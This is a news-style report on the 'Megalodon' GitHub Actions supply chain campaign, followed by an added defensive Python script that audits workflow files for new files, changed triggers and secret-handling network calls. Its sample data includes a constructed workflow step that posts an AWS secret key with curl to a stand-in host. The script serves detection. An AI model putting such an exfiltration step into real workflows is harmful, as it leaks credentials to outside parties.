In a significant cybersecurity breach, over 5,500 GitHub repositories were compromised in a sophisticated supply chain attack known as ‘Megalodon’. The operation, identified by security researchers, used automated commits to inject malware into repositories.
Understanding the Megalodon Campaign
The Megalodon attack leverages GitHub Actions workflows to deploy a malicious payload. This payload is designed to exfiltrate sensitive information such as credentials, keys, and tokens. SafeDep, a cybersecurity firm, reported that more than 5,700 malicious commits were made to affected repositories within a mere six-hour period on May 18.
The attack involved two distinct payloads. One inserted a new workflow to be activated with every push and pull request, while the other altered existing workflows, creating potential backdoors. The malware on compromised machines could gather a wide array of sensitive data, including AWS credentials and GitHub tokens.
Discovery and Impact
The Megalodon campaign was uncovered following the detection of compromised versions of the Tiledesk package, an open-source chatbot platform. These versions were published between May 19 and May 21 without the maintainer’s knowledge, as the GitHub repository had been previously compromised.
SafeDep’s investigation revealed that all 5,718 malicious commits were executed on May 18, between 11:36 and 17:48 UTC. The attack targeted 5,561 distinct repositories, using the ‘workflow_dispatch’ feature in GitHub Actions so that the backdoors could be triggered later on demand.
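As an added defensive illustration (not code from SafeDep, Ox Security or the article), the following Python audit compares a repository's workflow files against a recorded baseline and flags the two changes described above: newly added workflow files and altered trigger sets (such as a new workflow_dispatch trigger), plus steps that reference secrets next to a network client. The file names, workflow contents and baseline triggers are constructed sample data.

```python
import re

# Constructed sample data (not from the incident): triggers recorded for the known CI
# workflow before the change, and the workflow files as found in the repository now.
# ci.yml gained a manual trigger (altered-workflow payload); deps-check.yml is new (new-workflow payload).
BASELINE_TRIGGERS = {"ci.yml": {"push", "pull_request"}}
WORKFLOWS = {
    "ci.yml": "on:\n  push:\n  pull_request:\n  workflow_dispatch:\njobs:\n  build:\n    runs-on: ubuntu-latest\n    steps:\n      - run: make test\n",
    "deps-check.yml": "on: [push, pull_request]\njobs:\n  check:\n    runs-on: ubuntu-latest\n    steps:\n      - run: curl -s -X POST -d \"${{ secrets.AWS_SECRET_ACCESS_KEY }}\" https://example.invalid/c\n",
}

def triggers(text):
    """Event names under the workflow's top-level `on:` key (flow list, scalar or block mapping)."""
    lines = text.splitlines()
    for i, line in enumerate(lines):
        m = re.match(r'^["\']?on["\']?:\s*(.*)$', line)
        if not m:
            continue
        rest = m.group(1).split("#")[0].strip()
        if rest:  # inline form: `on: push` or `on: [push, pull_request]`
            return {t.strip().strip("\"'") for t in rest.strip("[]").split(",") if t.strip()}
        found, child_indent = set(), None  # block mapping: collect the first-level keys
        for nxt in lines[i + 1:]:
            if not nxt.strip() or nxt.lstrip().startswith("#"):
                continue
            indent = len(nxt) - len(nxt.lstrip())
            if indent == 0:
                break
            child_indent = indent if child_indent is None else child_indent
            if indent == child_indent:
                found.add(nxt.strip().split(":")[0].strip("\"'- "))
        return found
    return set()

def audit(workflows, baseline):
    """Per-file findings: new files, changed trigger sets, manual triggers, secrets beside a network client."""
    findings = {}
    for name, text in workflows.items():
        trig, notes = triggers(text), []
        if name not in baseline:
            notes.append("new workflow file")
        elif trig != baseline[name]:
            notes.append(f"triggers changed: +{sorted(trig - baseline[name])}")
        if "workflow_dispatch" in trig:
            notes.append("manually dispatchable")
        if re.search(r"secrets\.\w+", text) and re.search(r"\b(curl|wget)\b", text):
            notes.append("secrets referenced alongside a network client")
        if notes:
            findings[name] = notes
    return findings
```

Run `audit(WORKFLOWS, BASELINE_TRIGGERS)` against a checkout to get a per-file list of what changed; the baseline would normally come from a trusted earlier commit or a policy file rather than a literal.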
Response and Future Implications
In response, NPM has invalidated all granular access tokens with write permissions that bypass two-factor authentication. However, Ox Security highlights that this step, while helpful, does not address the root problem of unchecked code uploads.
Experts describe the incident as the start of a new era of supply chain attacks and warn of more frequent and severe threats ahead. As developers and organizations prepare for these challenges, stronger vetting and security measures become increasingly crucial.
As the landscape of cybersecurity threats evolves, this attack serves as a stark reminder of the vulnerabilities present in software supply chains. The industry must adapt to mitigate risks and protect against future attacks.
